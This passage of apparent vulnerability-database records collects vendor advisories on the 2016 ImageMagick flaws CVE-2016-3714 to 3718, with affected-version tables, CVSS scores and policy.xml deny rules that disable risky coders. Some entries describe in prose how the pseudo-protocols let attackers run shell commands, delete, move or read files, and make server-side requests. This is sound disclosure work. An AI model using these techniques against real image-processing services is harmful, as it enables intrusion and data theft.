| None | Low | ImageMagick \nBIG-IQ Centralized Management | 4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action**: Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick** global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol10550253\n\n 3. Edit the **ImageMagick** global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick** coders in the **policymap** stanza. For example, since the vulnerable coder listed in CVE-2016-3715 is EPHEMERAL, the modified **policymap** stanza should look similar to the following example: \n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /> \n</policymap>\n\n 5. 
Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-14T02:44:00", "type": "f5", "title": "ImageMagick vulnerability CVE-2016-3715", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2017-08-24T00:30:00", "id": "F5:K10550253", "href": "https://support.f5.com/csp/article/K10550253", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-20T21:07:47", "description": "\nF5 Product Development has assigned ID 591918 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H61974123 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | None | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | 
None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 | None | Low | ImageMagick \nBIG-IQ Centralized Management | 4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick** global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol61974123\n\n 3. Edit the **ImageMagick** global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick** coders in the **policymap** stanza. For example, if the **HTTP** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /> \n \nSince the vulnerable coders listed in CVE-2016-3718 are HTTP and FTP, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"FTP\" /> \n</policymap>\n\n 5. 
Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-14T02:43:00", "type": "f5", "title": "ImageMagick vulnerability CVE-2016-3718", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2017-08-24T20:36:00", "id": "F5:K61974123", "href": "https://support.f5.com/csp/article/K61974123", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-28T23:15:43", "description": "\nF5 Product Development has assigned ID 591881 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H25102203 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not 
vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 | None | Low | ImageMagick \nBIG-IQ Centralized Management | 5.0.0 \n4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick** global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.SOL25102203\n\n 3. Edit the **ImageMagick** global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick** coders in the **policymap** stanza. For example, since the vulnerable coder listed in CVE-2016-3716 is MSL, the modified **policymap** stanza should look similar to the following example: \n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /> \n</policymap>\n\n 5. 
Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide\n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-14T02:44:00", "type": "f5", "title": "ImageMagick vulnerability CVE-2016-3716", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2017-08-24T00:40:00", "id": "F5:K25102203", "href": "https://support.f5.com/csp/article/K25102203", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nOpenwall reports:\n\nInsufficient filtering for filename passed to delegate's command\n\t allows remote code execution during conversion of several file\n\t formats. Any service which uses ImageMagick to process user\n\t supplied images and uses default delegates.xml / policy.xml,\n\t may be vulnerable to this issue.\nIt is possible to make ImageMagick perform a HTTP GET or FTP\n\t request\nIt is possible to delete files by using ImageMagick's 'ephemeral'\n\t pseudo protocol which deletes files after reading.\nIt is possible to move image files to file with any extension\n\t in any folder by using ImageMagick's 'msl' pseudo protocol.\n\t msl.txt and image.gif should exist in known location - /tmp/\n\t for PoC (in real life it may be web service written in PHP,\n\t which allows to upload raw txt files and process images with\n\t ImageMagick).\nIt is possible to get content of the files from the server\n\t by using ImageMagick's 'label' pseudo protocol.\n\n\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": 
"NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-03T00:00:00", "type": "freebsd", "title": "ImageMagick -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-07T00:00:00", "id": "0D724B05-687F-4527-9C03-AF34D3B094EC", "href": "https://vuxml.freebsd.org/freebsd/0d724b05-687f-4527-9c03-af34d3b094ec.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2021-06-08T18:38:55", "description": "This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing \"/etc/ImageMagick-*/policy.xml\" (bsc#978061)\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n - Use external svg loader 
(rsvg)\n\n", "cvss3": {}, "published": "2016-05-07T13:08:32", "type": "suse", "title": "Security update for ImageMagick (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-07T13:08:32", "id": "SUSE-SU-2016:1260-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00024.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:38:55", "description": "This update for ImageMagick fixes the following issues:\n\n The update disables various insecure coders [boo#978061]. These fix issues\n tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, CVE-2016-3717,\n CVE-2016-3718\n\n", "cvss3": {}, "published": "2016-05-07T14:07:41", "type": "suse", "title": "Security update for ImageMagick (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-07T14:07:41", "id": "OPENSUSE-SU-2016:1261-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00025.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:38:55", "description": "This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing \"/etc/ImageMagick-*/policy.xml\" (bsc#978061)\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any 
folder.\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n - Use external svg loader (rsvg)\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n", "cvss3": {}, "published": "2016-05-07T18:07:43", "type": "suse", "title": "Security update for ImageMagick (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-07T18:07:43", "id": "OPENSUSE-SU-2016:1266-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00028.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:38:55", "description": "This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled. 
They can be re-enabled by exporting the\n following environment variable\n MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/modules-Q16/coders/vulnerable/ (bsc#978061)\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n - Use external svg loader (rsvg)\n\n", "cvss3": {}, "published": "2016-05-11T17:08:09", "type": "suse", "title": "Security update for ImageMagick (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-11T17:08:09", "id": "SUSE-SU-2016:1275-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00032.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:38:46", "description": "This update for GraphicsMagick fixes the following issues:\n\n Security issues fixed:\n - Multiple security issues in GraphicsMagick/ImageMagick [boo#978061]\n (CVE-2016-3714, CVE-2016-3718, CVE-2016-3715, CVE-2016-3717)\n\n", "cvss3": {}, "published": "2016-05-18T14:08:13", "type": "suse", "title": "Security update for GraphicsMagick (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-18T14:08:13", "id": "OPENSUSE-SU-2016:1326-1", "href": 
"http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00051.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:38:47", "description": "This update for GraphicsMagick fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2017-8350: The PNG/JNG decoder received an incremental fix, fixing\n some related issues in the same code. (bsc#1036985)\n - CVE-2017-9439: A memory leak was found in the function ReadPDBImage\n in coders/pdb.c (bsc#1042826)\n - CVE-2017-9501: An assertion failure could cause a denial of service via\n a crafted file (bsc#1043289)\n - CVE-2017-11403: The ReadMNGImage function in coders/png.c has an\n out-of-order CloseBlob call, resulting in a use-after-free via a crafted\n file (bsc#1049072)\n - CVE-2017-11643: A heap overflow in WriteCMYKImage() function in\n coders/cmyk.c was fixed (bsc#1050611)\n - CVE-2017-11636: A heap overflow in WriteRGBImage() in coders/rgb.c was\n fixed (bsc#1050674)\n\n", "cvss3": {}, "published": "2017-08-22T18:07:53", "type": "suse", "title": "Security update for GraphicsMagick (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2017-9501", "CVE-2017-11636", "CVE-2017-11643", "CVE-2017-11403", "CVE-2017-8350", "CVE-2017-9439"], "modified": "2017-08-22T18:07:53", "id": "SUSE-SU-2017:2229-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00059.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2021-06-08T18:38:55", "description": "[6.7.2.7-4]\n- Add fix for CVE-2016-3714, CVE-2016-3715, CVE-2016-3716 and CVE-2016-3717", "edition": 2, "cvss3": {}, "published": "2016-05-09T00:00:00", "type": "oraclelinux", "title": "ImageMagick security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": 
"2016-05-09T00:00:00", "id": "ELSA-2016-0726", "href": "http://linux.oracle.com/errata/ELSA-2016-0726.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-10-19T18:36:48", "description": "ImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats.\n\nSecurity Fix(es):\n\n* It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application. (CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting 